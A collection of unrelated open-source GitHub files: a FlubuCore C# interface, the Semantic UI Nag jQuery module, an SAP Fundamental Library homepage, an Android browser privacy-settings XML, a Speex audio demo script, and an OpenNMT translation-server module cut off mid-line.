namespace FlubuCore.Tasks.Process { public interface IExternalProcess<out T> where T : ITask { /// <summary> /// Set the full file path of the executable file. /// </summary> /// <param name="executableFullFilePath"></param> /// <returns></returns> T Executable(string executableFullFilePath); /// <summary> /// Add argument for executable. /// </summary> /// <param name="arg"></param> /// <param name="maskArg">If <c>true</c> argument is masked. Otherwise not.</param> /// <returns></returns> T WithArguments(string arg, bool maskArg); /// <summary> /// Add arguments for executable. /// </summary> /// <param name="args"></param> /// <returns></returns> T WithArguments(params string[] args); /// <summary> /// Clear all arguments for the command line. /// </summary> /// <returns></returns> T ClearArguments(); /// <summary> /// Set the working folder for the executable. /// </summary> /// <param name="folder"></param> /// <returns></returns> T WorkingFolder(string folder); /// <summary> /// Do not log output to the console. /// </summary> /// <returns></returns> T DoNotLogOutput(); } }
{ "pile_set_name": "Github" }
/*! * # Semantic UI - Nag * http://github.com/semantic-org/semantic-ui/ * * * Released under the MIT license * http://opensource.org/licenses/MIT * */ ;(function ($, window, document, undefined) { "use strict"; window = (typeof window != 'undefined' && window.Math == Math) ? window : (typeof self != 'undefined' && self.Math == Math) ? self : Function('return this')() ; $.fn.nag = function(parameters) { var $allModules = $(this), moduleSelector = $allModules.selector || '', time = new Date().getTime(), performance = [], query = arguments[0], methodInvoked = (typeof query == 'string'), queryArguments = [].slice.call(arguments, 1), returnedValue ; $allModules .each(function() { var settings = ( $.isPlainObject(parameters) ) ? $.extend(true, {}, $.fn.nag.settings, parameters) : $.extend({}, $.fn.nag.settings), className = settings.className, selector = settings.selector, error = settings.error, namespace = settings.namespace, eventNamespace = '.' + namespace, moduleNamespace = namespace + '-module', $module = $(this), $close = $module.find(selector.close), $context = (settings.context) ? $(settings.context) : $('body'), element = this, instance = $module.data(moduleNamespace), moduleOffset, moduleHeight, contextWidth, contextHeight, contextOffset, yOffset, yPosition, timer, module, requestAnimationFrame = window.requestAnimationFrame || window.mozRequestAnimationFrame || window.webkitRequestAnimationFrame || window.msRequestAnimationFrame || function(callback) { setTimeout(callback, 0); } ; module = { initialize: function() { module.verbose('Initializing element'); $module .on('click' + eventNamespace, selector.close, module.dismiss) .data(moduleNamespace, module) ; if(settings.detachable && $module.parent()[0] !== $context[0]) { $module .detach() .prependTo($context) ; } if(settings.displayTime > 0) { setTimeout(module.hide, settings.displayTime); } module.show(); }, destroy: function() { module.verbose('Destroying instance'); $module .removeData(moduleNamespace) .off(eventNamespace) ; }, show: function() { if( module.should.show() && !$module.is(':visible') ) { module.debug('Showing nag', settings.animation.show); if(settings.animation.show == 'fade') { $module .fadeIn(settings.duration, settings.easing) ; } else { $module .slideDown(settings.duration, settings.easing) ; } } }, hide: function() { module.debug('Showing nag', settings.animation.hide); if(settings.animation.show == 'fade') { $module .fadeIn(settings.duration, settings.easing) ; } else { $module .slideUp(settings.duration, settings.easing) ; } }, onHide: function() { module.debug('Removing nag', settings.animation.hide); $module.remove(); if (settings.onHide) { settings.onHide(); } }, dismiss: function(event) { if(settings.storageMethod) { module.storage.set(settings.key, settings.value); } module.hide(); event.stopImmediatePropagation(); event.preventDefault(); }, should: { show: function() { if(settings.persist) { module.debug('Persistent nag is set, can show nag'); return true; } if( module.storage.get(settings.key) != settings.value.toString() ) { module.debug('Stored value is not set, can show nag', module.storage.get(settings.key)); return true; } module.debug('Stored value is set, cannot show nag', module.storage.get(settings.key)); return false; } }, get: { storageOptions: function() { var options = {} ; if(settings.expires) { options.expires = settings.expires; } if(settings.domain) { options.domain = settings.domain; } if(settings.path) { options.path = settings.path; } return options; } }, clear: function() { module.storage.remove(settings.key); }, storage: { set: function(key, value) { var options = module.get.storageOptions() ; if(settings.storageMethod == 'localstorage' && window.localStorage !== undefined) { window.localStorage.setItem(key, value); module.debug('Value stored using local storage', key, value); } else if(settings.storageMethod == 'sessionstorage' && window.sessionStorage !== undefined) { window.sessionStorage.setItem(key, value); module.debug('Value stored using session storage', key, value); } else if($.cookie !== undefined) { $.cookie(key, value, options); module.debug('Value stored using cookie', key, value, options); } else { module.error(error.noCookieStorage); return; } }, get: function(key, value) { var storedValue ; if(settings.storageMethod == 'localstorage' && window.localStorage !== undefined) { storedValue = window.localStorage.getItem(key); } else if(settings.storageMethod == 'sessionstorage' && window.sessionStorage !== undefined) { storedValue = window.sessionStorage.getItem(key); } // get by cookie else if($.cookie !== undefined) { storedValue = $.cookie(key); } else { module.error(error.noCookieStorage); } if(storedValue == 'undefined' || storedValue == 'null' || storedValue === undefined || storedValue === null) { storedValue = undefined; } return storedValue; }, remove: function(key) { var options = module.get.storageOptions() ; if(settings.storageMethod == 'localstorage' && window.localStorage !== undefined) { window.localStorage.removeItem(key); } else if(settings.storageMethod == 'sessionstorage' && window.sessionStorage !== undefined) { window.sessionStorage.removeItem(key); } // store by cookie else if($.cookie !== undefined) { $.removeCookie(key, options); } else { module.error(error.noStorage); } } }, setting: function(name, value) { module.debug('Changing setting', name, value); if( $.isPlainObject(name) ) { $.extend(true, settings, name); } else if(value !== undefined) { if($.isPlainObject(settings[name])) { $.extend(true, settings[name], value); } else { settings[name] = value; } } else { return settings[name]; } }, internal: function(name, value) { if( $.isPlainObject(name) ) { $.extend(true, module, name); } else if(value !== undefined) { module[name] = value; } else { return module[name]; } }, debug: function() { if(!settings.silent && settings.debug) { if(settings.performance) { module.performance.log(arguments); } else { module.debug = Function.prototype.bind.call(console.info, console, settings.name + ':'); module.debug.apply(console, arguments); } } }, verbose: function() { if(!settings.silent && settings.verbose && settings.debug) { if(settings.performance) { module.performance.log(arguments); } else { module.verbose = Function.prototype.bind.call(console.info, console, settings.name + ':'); module.verbose.apply(console, arguments); } } }, error: function() { if(!settings.silent) { module.error = Function.prototype.bind.call(console.error, console, settings.name + ':'); module.error.apply(console, arguments); } }, performance: { log: function(message) { var currentTime, executionTime, previousTime ; if(settings.performance) { currentTime = new Date().getTime(); previousTime = time || currentTime; executionTime = currentTime - previousTime; time = currentTime; performance.push({ 'Name' : message[0], 'Arguments' : [].slice.call(message, 1) || '', 'Element' : element, 'Execution Time' : executionTime }); } clearTimeout(module.performance.timer); module.performance.timer = setTimeout(module.performance.display, 500); }, display: function() { var title = settings.name + ':', totalTime = 0 ; time = false; clearTimeout(module.performance.timer); $.each(performance, function(index, data) { totalTime += data['Execution Time']; }); title += ' ' + totalTime + 'ms'; if(moduleSelector) { title += ' \'' + moduleSelector + '\''; } if( (console.group !== undefined || console.table !== undefined) && performance.length > 0) { console.groupCollapsed(title); if(console.table) { console.table(performance); } else { $.each(performance, function(index, data) { console.log(data['Name'] + ': ' + data['Execution Time']+'ms'); }); } console.groupEnd(); } performance = []; } }, invoke: function(query, passedArguments, context) { var object = instance, maxDepth, found, response ; passedArguments = passedArguments || queryArguments; context = element || context; if(typeof query == 'string' && object !== undefined) { query = query.split(/[\. ]/); maxDepth = query.length - 1; $.each(query, function(depth, value) { var camelCaseValue = (depth != maxDepth) ? value + query[depth + 1].charAt(0).toUpperCase() + query[depth + 1].slice(1) : query ; if( $.isPlainObject( object[camelCaseValue] ) && (depth != maxDepth) ) { object = object[camelCaseValue]; } else if( object[camelCaseValue] !== undefined ) { found = object[camelCaseValue]; return false; } else if( $.isPlainObject( object[value] ) && (depth != maxDepth) ) { object = object[value]; } else if( object[value] !== undefined ) { found = object[value]; return false; } else { module.error(error.method, query); return false; } }); } if ( $.isFunction( found ) ) { response = found.apply(context, passedArguments); } else if(found !== undefined) { response = found; } if($.isArray(returnedValue)) { returnedValue.push(response); } else if(returnedValue !== undefined) { returnedValue = [returnedValue, response]; } else if(response !== undefined) { returnedValue = response; } return found; } }; if(methodInvoked) { if(instance === undefined) { module.initialize(); } module.invoke(query); } else { if(instance !== undefined) { instance.invoke('destroy'); } module.initialize(); } }) ; return (returnedValue !== undefined) ? returnedValue : this ; }; $.fn.nag.settings = { name : 'Nag', silent : false, debug : false, verbose : false, performance : true, namespace : 'Nag', // allows cookie to be overridden persist : false, // set to zero to require manually dismissal, otherwise hides on its own displayTime : 0, animation : { show : 'slide', hide : 'slide' }, context : false, detachable : false, expires : 30, domain : false, path : '/', // type of storage to use storageMethod : 'cookie', // value to store in dismissed localstorage/cookie key : 'nag', value : 'dismiss', error: { noCookieStorage : '$.cookie is not included. A storage solution is required.', noStorage : 'Neither $.cookie or store is defined. A storage solution is required for storing state', method : 'The method you called is not defined.' }, className : { bottom : 'bottom', fixed : 'fixed' }, selector : { close : '.close.icon' }, speed : 500, easing : 'easeOutQuad', onHide: function() {} }; // Adds easing $.extend( $.easing, { easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; } }); })( jQuery, window, document );
{ "pile_set_name": "Github" }
--- title: Homepage keywords: Homepage sidebar: toc: false permalink: index.html layout: default-no-sidebar topnavhidden: true footerhidden: true --- <style> .main-content { height: 100vh !important; background-color: #ffffff !important; position: relative; } </style> <header style="width: 100%;"> <div class="header-section" id="headerSection"> <div class="header-section__hamburger"> <button id="hamburgerToggle" class="sap-icon--menu2 header-section__sap-icon--menu2" onclick="toggleHamburger()" aria-label="Open/Close Main Navigation"></button> </div> <div class="header-section__logo"> <img src="{{site.baseurl}}/images/land-page-assets/logo_text.png" alt="Fundamental Library Styles Logo and Text" /> </div> <!-- id="headerLinks" --> <nav id="responsiveMenu" class="header-section__links"> <h2 class="vh">Main Navigation</h2> <ul> <li><a href="#libraries">Libraries</a></li> <li><a href="#features">Key Features</a></li> <li><a href="#about">About</a></li> <li><a href="#design">Design</a></li> <li><a href="#learn">Learn More</a></li> <li><a href="#community">Community</a></li> <li><a href="mailto:fundamental@sap.com" target="_blank">Email Us</a></li> </ul> </nav> </div> <div class="intro-section" id="intro-section"> <div class="intro-section__container"> <img class="intro-section__logo" src="{{site.baseurl}}/images/land-page-assets/logo.svg" alt="Fundamental Library Logo" /> <h1 class="intro-section__text"><span class="vh">Fundamental Library - </span>An open source and community driven project to provide a consistent user interface across web applications.</h1> </div> </div> </header> <main style="width: 100%;"> <section class="libraries-section" id="libraries"> <h2 class="libraries-section__title">Fundamental Library</h2> <div class="libraries-section__container"> <div class="libraries-section__item"> <div> <img src="{{site.baseurl}}/images/land-page-assets/css_html.svg" alt="Logos of the official W3C HTML5 and CSS specifications" class="libraries-section__logo" /> <h3 class="libraries-section__item-title">Fundamental Library Styles</h3> <p class="libraries-section__text">Delivers a Fiori 3 component library for building SAP user interfaces with any web technology.</p> </div> <div class="libraries-section__links"> <a class="libraries-section__more" href="https://sap.github.io/fundamental-styles/" target="_blank">Learn More <span class="vh">about Fundamental Library Styles</span></a> <a class="libraries-section__more" href="https://github.com/SAP/fundamental-styles" target="_blank">GitHub</a> </div> </div> <div class="libraries-section__item"> <div> <img src="{{site.baseurl}}/images/land-page-assets/angular.svg" alt="Logo of the AngularJS Framework" class="libraries-section__logo" /> <h3 class="libraries-section__item-title">Fundamental Library for Angular</h3> <p class="libraries-section__text">Provides an Angular implementation of the components designed in Fundamental-Styles.</p> </div> <div class="libraries-section__links"> <a class="libraries-section__more" href="https://sap.github.io/fundamental-ngx/" target="_blank">Learn More <span class="vh">about Fundamental Library for Angular</span></a> <a class="libraries-section__more" href="https://github.com/SAP/fundamental-ngx" target="_blank">GitHub</a> </div> </div> <div class="libraries-section__item"> <div> <img src="{{site.baseurl}}/images/land-page-assets/react.svg" alt="Logo of the React Framework" class="libraries-section__logo" /> <h3 class="libraries-section__item-title">Fundamental Library for React</h3> <p class="libraries-section__text">Offers a React implementation of the components designed in Fundamental Styles.</p> </div> <div class="libraries-section__links"> <a class="libraries-section__more" href="https://sap.github.io/fundamental-react/" target="_blank">Learn More <span class="vh">about Fundamental Library for React</span></a> <a class="libraries-section__more" href="https://github.com/SAP/fundamental-react" target="_blank">GitHub</a> </div> </div> <div class="libraries-section__item"> <div> <img src="{{site.baseurl}}/images/land-page-assets/vue.svg" alt="Logo of the Vue.js Framework" class="libraries-section__logo" /> <h3 class="libraries-section__item-title">Fundamental Library for Vue</h3> <p class="libraries-section__text">Supplies a Vue implementation of the components designed in Fundamental Styles.</p> </div> <div class="libraries-section__links"> <a class="libraries-section__more" href="https://sap.github.io/fundamental-vue/" target="_blank">Learn More <span class="vh">about Fundamental Library for Vue</span></a> <a class="libraries-section__more" href="https://github.com/SAP/fundamental-vue" target="_blank">GitHub</a> </div> </div> </div> </section> <section class="features-section" id="features"> <h2 class="features-section__title">Key Features</h2> <div class="features-section__container"> <div class="features-section__item"> <img src="{{site.baseurl}}/images/land-page-assets/foundational.png" alt="Pictogram of a stone wall" class="features-section__logo" /> <h3 class="features-section__item-title">Foundational</h3> <p class="features-section__text">Focuses on web standards; basic elements and simple patterns.</p> </div> <div class="features-section__item"> <img src="{{site.baseurl}}/images/land-page-assets/modular.png" alt="Pictogram of stacked boxes" class="features-section__logo" /> <h3 class="features-section__item-title">Modular</h3> <p class="features-section__text">Revolves around self-contained components, while encapsulating styles and behaviours.</p> </div> <div class="features-section__item"> <img src="{{site.baseurl}}/images/land-page-assets/flexible.png" alt="Pictogram of Arrows" class="features-section__logo" /> <h3 class="features-section__item-title">Flexible</h3> <p class="features-section__text">Encompasses theming capabilities and combines basic blocks to create complex components.</p> </div> <div class="features-section__item"> <img src="{{site.baseurl}}/images/land-page-assets/collaborative.png" alt="Pictorgram of people speaking" class="features-section__logo" /> <h3 class="features-section__item-title">Collaborative</h3> <p class="features-section__text">Welcomes multiple contributors within its community and allows for fast release cycles.</p> </div> </div> </section> <section class="about-section" id="about"> <h2 class="about-section__title">More about Fundamental Library</h2> <div class="about-section__container"> <p class="about-section__item">Ensuring a consistent look and feel, while harmonizing multiple products and applications, is a demanding and expensive task. It entails rebuilding them from the ground up and accommodating them to SAP UX standards. The Fundamental Libraries grew out of a need to address just that.</p> <p class="about-section__item">Fundamentals is comprised of a set of libraries that cover the most common UI components, patterns and layouts. It offers a design system and component library that allows teams the flexibility to quickly implement consistent UX with Fiori 3, without needing to change the frontend framework or library.</p> <p class="about-section__item">Fundamentals also tackles accessibility by using the proper semantic html tags such as buttons or anchor tags. By using the right html tag, the browsers cover about 80% of the accessibility requirements and the Fundamental Libraries team aims to cover the rest. Find access to the old version of Fundamentals <a href="{{site.baseurl}}/old.html">here.</a></p> </div> </section> <section class="section" id="design"> <h2 class="section__title">Design</h2> <p class="section__text"> Our UI Kit bundle includes ready-to-use, state-of-the-art drafts of SAP layouts, patterns and components in Sketch. You are welcome to use the UI kit to visualize your SAP app. They are easy to use and will provide a realistic impression of your final designs. </p> <div class="section__container-button"> <a role="button" class="section__button" href="./images/ui-kit/Fundamental_Library_UI_Kit_V.0.10.0.zip">Download</a> </div> <h3 class="section__subtitle">What's in the UI Kit bundle?</h3> <div class="section__container"> <div class="section__item"> <img src="{{site.baseurl}}/images/ui-kit/sketch-mac-icon.png" alt="Sketch Logo" class="section__logo"/> <h3 class="section__item-title">Sketch UI Kit v0.10.0 </h3> <p class="section__text">Our Sketch file has over 30 unique, refined, and streamlined components to empower anyone using Fundamental Library with the ability to quickly and efficiently build Fiori 3 interfaces.</p> </div> <div class="section__item"> <img src="{{site.baseurl}}/images/ui-kit/typeface.png" alt="Sketch Logo" class="section__logo" /> <h3 class="section__item-title">72 Font </h3> <p class="section__text">SAP 72 font family was designed from the ground up and made it possible to meet SAP's typographic requirements, including - Legibility Enhancements, Font Styles, Brand Voice, Character Set and Language Support.</p> </div> <div class="section__item"> <img src="{{site.baseurl}}/images/ui-kit/icons-grid.png" alt="Sketch Logo" class="section__logo" /> <h3 class="section__item-title">Icon Font </h3> <p class="section__text">SAP icons have been created with a friendly, yet elegant style that is consistent in terms of size, stroke and balance. The icons are tailored for simple and direct user interaction, using metaphors that are easy to understand.</p> </div> </div> </section> <section class="section section--learn" id="learn"> <h2 class="section__title section__title--learn">Learn more</h2> <div class="section__container section__container-inner"> <div class="section__item section__item--learn section__item--img"> <div class="section__item section__item--learn section__item--learn-inner"> <h3>Blog Post</h3> <div class="blog"> <a href="https://blogs.sap.com/2020/04/10/integrating-sap-apps-from-a-ux-pov-about-fundamental-library-and-ui5-web-components/">Integrating SAP Apps from a UX POV: About Fundamental Library and UI5 Web Components</a> <span>April 10, 2020</span> <p>Integrating SAP Apps from a UX POV: About Fundamental Library and UI5 Web Components</p> </div> <img alt="blog" src="./images/ipad-example.jpg"/> <h3>Blog Post</h3> <div class="blog"> <a href="https://blogs.sap.com/2020/09/09/fundamental-library-releases-ui-kit-v0.10.0/">Fundamental Library Releases UI Kit v0.10.0</a> <span>September 9, 2020</span> </div> <h3>Blog Post</h3> <div class="blog"> <a href="https://blogs.sap.com/2020/08/23/fundamental-library-for-abap/">Fundamental Library for ABAP</a> <span>August 23, 2020</span> </div> </div> </div> <div class="section__item section__item--learn"> <div class="section__item section__item--learn section__item--learn-inner"> <a class="twitter-timeline" href="https://twitter.com/fundamental_lib?ref_src=twsrc%5Etfw">Tweets by fundamental_lib</a> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> </div> </div> <div class="section__item section__item--learn section__item--youtube"> <iframe type="text/html" width="1px" class="section__logo section__logo--learn" src="https://www.youtube.com/embed/?listType=playlist&list=PLChUxte5emJbKO8z7K68tBeXdlwi8ZFkv" frameborder="0"></iframe> </div> </div> </section> <section class="community-section" id="community"> <h2 class="community-section__title">Community</h2> <p class="community-section__text">Join our vibrant community of developers and help drive the Fundamental Libraries forward! Take part in the conversation via our various channels.</p> <div class="community-section__container"> <div class="community-section__item"> <a href="https://github.com/SAP/fundamental-styles" target="_blank" class="community-section__logo"> <img src="{{site.baseurl}}/images/land-page-assets/github.png" alt="github logo" /> <span class="vh">Visit us on</span> GitHub </a> </div> <div class="community-section__item"> <a href="https://twitter.com/fundamental_lib" target="_blank" class="community-section__logo"> <img src="{{site.baseurl}}/images/land-page-assets/twitter.png" alt="twitter logo" /> <span class="vh">Visit us on</span> Twitter </a> </div> <div class="community-section__item"> <a href="https://ui-fundamentals.slack.com" target="_blank" class="community-section__logo"> <img src="{{site.baseurl}}/images/land-page-assets/slack.png" alt="slack logo" /> <span class="vh">Talk to us via</span> Slack </a> </div> <div class="community-section__item"> <a href="https://www.youtube.com/channel/UCkq8zSSBngKze-rUypz0t2w" target="_blank" class="community-section__logo"> <img src="{{site.baseurl}}/images/land-page-assets/youtube.png" alt="youtube logo" /> <span class="vh">Visit us on</span> YouTube </a> </div> </div> </section> </main> <footer class="footer-section"> <div class="footer-section__container--left"> <div class="footer-section__slogan-logo"> <span class="footer-section__slogan">THE BEST RUN</span> <img src="{{site.baseurl}}/images/land-page-assets/sap.png" alt="SAP logo" height="16" /> </div> <p class="footer-section__copyright">&copy; Copyright SAP 2020</p> </div> <div class="footer-section__container--right"> <a href="https://www.sap.com/about/legal/privacy.html" target="_blank">Privacy</a> <a href="https://www.sap.com/about/legal/impressum.html" target="_blank">Legal Disclosure</a> <a href="https://www.sap.com/about/legal/copyright.html" target="_blank">Copyright and Trademarks</a> <a href="https://www.sap.com/corporate/en/legal/terms-of-use.html" target="_blank">Terms of Use</a> </div> </footer> <a id="back2Top" href="#headerSection" class="backToTopHidden">&#8593;</a> <!-- <div id="responsiveMenu" class="responsive-menu"> <a href="#libraries">Libraries</a> <a href="#features">Key Features</a> <a href="#about">About</a> <a href="#community">Community</a> <a href="mailto:fundamental@sap.com" target="_blank">Send us an email</a> </div> --> <script> document.getElementById("tg-sb-content").onscroll = function() { const mainContent = document.getElementById("tg-sb-content"); if (mainContent.scrollTop > 200 ) { document.getElementById("back2Top").className = "backToTopVisible"; } else { document.getElementById("back2Top").className = "backToTopHidden"; } }; function toggleHamburger() { const toggle = document.getElementById("hamburgerToggle"); const menu = document.getElementById("responsiveMenu"); if (toggle.className === "sap-icon--menu2 header-section__sap-icon--menu2") { toggle.className = "sap-icon--decline header-section__sap-icon--decline"; menu.classList += " show"; } else { toggle.className = "sap-icon--menu2 header-section__sap-icon--menu2"; menu.classList = "header-section__links responsive-menu hide"; setTimeout(function(){ menu.classList = "responsive-menu header-section__links"; }, 500); } } </script>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <!-- Copyright (C) 2008 The Android Open Source Project Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <PreferenceScreen xmlns:android="http://schemas.android.com/apk/res/android"> <com.android.browser.BrowserYesNoPreference android:key="privacy_clear_cache" android:title="@string/pref_privacy_clear_cache" android:summary="@string/pref_privacy_clear_cache_summary" android:dialogMessage="@string/pref_privacy_clear_cache_dlg" android:dialogIcon="@android:drawable/ic_dialog_alert" /> <com.android.browser.BrowserYesNoPreference android:key="privacy_clear_history" android:title="@string/pref_privacy_clear_history" android:summary="@string/pref_privacy_clear_history_summary" android:dialogMessage="@string/pref_privacy_clear_history_dlg" android:dialogIcon="@android:drawable/ic_dialog_alert"/> <CheckBoxPreference android:key="show_security_warnings" android:defaultValue="true" android:title="@string/pref_security_show_security_warning" android:summary="@string/pref_security_show_security_warning_summary" /> <PreferenceCategory android:title="@string/pref_privacy_cookies_title"> <CheckBoxPreference android:key="accept_cookies" android:defaultValue="true" android:title="@string/pref_security_accept_cookies" android:summary="@string/pref_security_accept_cookies_summary" /> <com.android.browser.BrowserYesNoPreference android:key="privacy_clear_cookies" android:title="@string/pref_privacy_clear_cookies" android:summary="@string/pref_privacy_clear_cookies_summary" android:dialogMessage="@string/pref_privacy_clear_cookies_dlg" android:dialogIcon="@android:drawable/ic_dialog_alert"/> </PreferenceCategory> <PreferenceCategory android:title="@string/pref_privacy_formdata_title"> <CheckBoxPreference android:key="save_formdata" android:defaultValue="true" android:title="@string/pref_security_save_form_data" android:summary="@string/pref_security_save_form_data_summary" /> <com.android.browser.BrowserYesNoPreference android:key="privacy_clear_form_data" android:title="@string/pref_privacy_clear_form_data" android:summary="@string/pref_privacy_clear_form_data_summary" android:dialogMessage="@string/pref_privacy_clear_form_data_dlg" android:dialogIcon="@android:drawable/ic_dialog_alert"/> </PreferenceCategory> <PreferenceCategory android:title="@string/pref_privacy_location_title"> <CheckBoxPreference android:key="enable_geolocation" android:defaultValue="true" android:title="@string/pref_privacy_enable_geolocation" android:summary="@string/pref_privacy_enable_geolocation_summary" /> <com.android.browser.BrowserYesNoPreference android:key="privacy_clear_geolocation_access" android:dependency="enable_geolocation" android:title="@string/pref_privacy_clear_geolocation_access" android:summary="@string/pref_privacy_clear_geolocation_access_summary" android:dialogMessage="@string/pref_privacy_clear_geolocation_access_dlg" android:dialogIcon="@android:drawable/ic_dialog_alert"/> </PreferenceCategory> <PreferenceCategory android:title="@string/pref_security_passwords_title"> <CheckBoxPreference android:key="remember_passwords" android:defaultValue="true" android:title="@string/pref_security_remember_passwords" android:summary="@string/pref_security_remember_passwords_summary" /> <com.android.browser.BrowserYesNoPreference android:key="privacy_clear_passwords" android:title="@string/pref_privacy_clear_passwords" android:summary="@string/pref_privacy_clear_passwords_summary" android:dialogMessage="@string/pref_privacy_clear_passwords_dlg" android:dialogIcon="@android:drawable/ic_dialog_alert"/> </PreferenceCategory> </PreferenceScreen>
{ "pile_set_name": "Github" }
(function (global) { var etimes = document.querySelector("#etimes") , dtimes = document.querySelector("#dtimes") , nrsamples = document.querySelector("#nrsamples"); function printStreamTimes(e, d, nr) { !!e && (etimes.innerHTML = ""+e); !!d && (dtimes.innerHTML = ""+d); !!nr && (nrsamples.innerHTML = ""+nr); } global.printStreamTimes = printStreamTimes; var tdtimes = document.querySelector("#dtotaltime") , tetimes = document.querySelector("#etotaltime") , dsize = document.querySelector("#dsize") , esize = document.querySelector("#esize"); function printFileTimes(ds, es, td, te) { !!ds && (dsize.innerHTML = ""+ds); !!es && (esize.innerHTML = ""+es); !!td && (tdtimes.innerHTML = ""+td); !!te && (tetimes.innerHTML = ""+te); } global.printFileTimes = printFileTimes; function addDownloadLink(filename, sel, data, mimetype) { var url = "data:"+mimetype+";base64,"+btoa(data); var container = document.querySelector(sel).parentElement; var anchor = "<br/><a download=\""+filename+"\" href=\"" + url + "\">" + filename + " ("+data.length/1024.0+" Kbytes)</a>"; container.innerHTML += anchor; } function handleFileSelect(evt, isTypedArray) { var file = evt.target.files[0]; Speex.readFile(evt, function(e) { var tks = file.name.split("."); var filename = tks[0] , ext = tks[1]; var samples, sampleRate; if (ext === "ogg") { var data = e.target.result, ret, header; ret = Speex.decodeFile(data); samples = ret[0]; header = ret[1]; sampleRate = header.rate; addDownloadLink(filename+".wav", "#file_ogg", samples, "audio/wav"); printFileTimes(samples.length*2, file.length, performance.getEntriesByName("decode")[0].duration, null); Speex.util.play(samples, sampleRate); } else if (ext == "wav") { var data = e.target.result; samples = Speex.encodeFile(data); addDownloadLink(filename+".ogg", "#file_wav", samples, "audio/ogg"); printFileTimes(data.length, samples.length, 0, performance.getEntriesByName("encode")[0].duration); } }, isTypedArray); } document.getElementById('file_ogg').addEventListener('change', function (evt) { handleFileSelect(evt); }, false); document.getElementById('file_wav').addEventListener('change', function (evt) { handleFileSelect(evt, true); }, false); setTimeout(function(){ Speex.checkAudioElements(); }, 200); })(window);
{ "pile_set_name": "Github" }
from __future__ import print_function import sys import os import argparse import torch import io import time import codecs import json import threading from onmt.translate.Translator import make_translator import onmt import onmt.opts import onmt.translate class Timer: def __init__(self, start=False): self.stime = -1 self.prev = -1 self.times = {} if start: self.start() def start(self): self.stime = time.time() self.prev = self.stime self.times = {} def tick(self, name=None, tot=False): t = time.time() if not tot: elapsed = t - self.prev else: elapsed = t - self.stime self.prev = t if name is not None: self.times[name] = elapsed return elapsed class ServerModelError(Exception): pass class TranslationServer(): def __init__(self): self.models = {} self.next_id = 0 def start(self, config_file): """Read the config file and pre-/load the models """ self.config_file = config_file with open(self.config_file) as f: self.confs = json.load(f) self.models_root = self.confs.get('models_root', './available_models') for i, conf in enumerate(self.confs["models"]): if "model" not in conf: raise ValueError("""Incorrect config file: missing 'model' parameter for model #%d""" % i) kwargs = {'timeout': conf.get('timeout', None), 'load': conf.get('load', None), 'tokenizer_opt': conf.get('tokenizer', None), 'on_timeout': conf.get('on_timeout', None), 'model_root': conf.get('model_root', self.models_root) } kwargs = {k: v for (k, v) in kwargs.items() if v is not None} model_id = conf.get("id", None) opt = conf["opt"] opt["model"] = conf["model"] self.preload_model(opt, model_id=model_id, **kwargs) def clone_model(self, model_id, opt, timeout=-1): """Clone a model `model_id`. Different options may be passed. If `opt` is None, it will use the same set of options """ if model_id in self.models: if opt is None: opt = self.models[model_id].user_opt opt["model"] = self.models[model_id].opt.model return self.load_model(opt, timeout) else: raise ServerModelError("No such model '%s'" % str(model_id)) def load_model(self, opt, model_id=None, **model_kwargs): """Loading a model given a set of options """ model_id = self.preload_model(opt, model_id=model_id, **model_kwargs) load_time = self.models[model_id].load_time return model_id, load_time def preload_model(self, opt, model_id=None, **model_kwargs): """Preloading the model: updating internal datastructure It will effectively load the model if `load` is set """ if model_id is not None: if model_id in self.models.keys(): raise ValueError("Model ID %d already exists" % model_id) else: model_id = self.next_id while model_id in self.models.keys(): model_id += 1 self.next_id = model_id + 1 print("Pre-loading model %d" % model_id) model = ServerModel(opt, model_id, **model_kwargs) self.models[model_id] = model return model_id def run(self, inputs): """Translate `inputs` We keep the same format as the Lua version i.e. [{"id": model_id, "src": "sequence to translate"},{ ...}] We use inputs[0]["id"] as the model id """ model_id = inputs[0].get("id", 0) if model_id in self.models and self.models[model_id] is not None: return self.models[model_id].run(inputs) else: print("Error No such model '%s'" % str(model_id)) raise ServerModelError("No such model '%s'" % str(model_id)) def unload_model(self, model_id): """Manually unload a model. It will free the memory and cancel the timer """ if model_id in self.models and self.models[model_id] is not None: self.models[model_id].unload() else: raise ServerModelError("No such model '%s'" % str(model_id)) def list_models(self): """Return the list of available models """ models = [] for i, model in self.models.items(): models += [model.to_dict()] return models class ServerModel: def __init__(self, opt, model_id, tokenizer_opt=None, load=False, timeout=-1, on_timeout="to_cpu", model_root="./"): """ Args: opt: (dict) options for the Translator model_id: (int) model id tokenizer_opt: (dict) options for the tokenizer or None load: (bool) whether to load the model during __init__ timeout: (int) seconds before running `do_timeout` Negative values means no timeout on_timeout: (str) in ["to_cpu", "unload"] set what to do on timeout (see function `do_timeout`) model_root: (str) path to the model directory it must contain de model and tokenizer file """ self.model_root = model_root self.opt = self.parse_opt(opt) if self.opt.n_best > 1: raise ValueError("Values of n_best > 1 are not supported") self.model_id = model_id self.tokenizer_opt = tokenizer_opt self.timeout = timeout self.on_timeout = on_timeout self.unload_timer = None self.user_opt = opt self.tokenizer = None if load: self.load() def parse_opt(self, opt): """Parse the option set passed by the user using `onmt.opts` Args: opt: (dict) options passed by the user Returns: opt: (Namespace) full set of options for the Translator """ prec_argv = sys.argv sys.argv = sys.argv[:1] parser = argparse.ArgumentParser() onmt.opts.translate_opts(parser) opt['model'] = os.path.join(self.model_root, opt['model']) opt['src'] = "dummy_src" for (k, v) in opt.items(): sys.argv += ['-%s' % k, str(v)] opt = parser.parse_args() opt.cuda = opt.gpu > -1 sys.argv = prec_argv return opt @property def loaded(self): return hasattr(self, 'translator') def load(self): timer = Timer() print("Loading model %d" % self.model_id) timer.start() self.out_file = io.StringIO() try: self.translator = make_translator(self.opt, report_score=False, out_file=self.out_file) except RuntimeError as e: raise ServerModelError("Runtime Error: %s" % str(e)) timer.tick("model_loading") if self.tokenizer_opt is not None: print("Loading tokenizer") mandatory = ["type", "model"] for m in mandatory: if m not in self.tokenizer_opt: raise ValueError("Missing mandatory tokenizer option '%s'" % m) if self.tokenizer_opt['type'] == 'sentencepiece': import sentencepiece as spm sp = 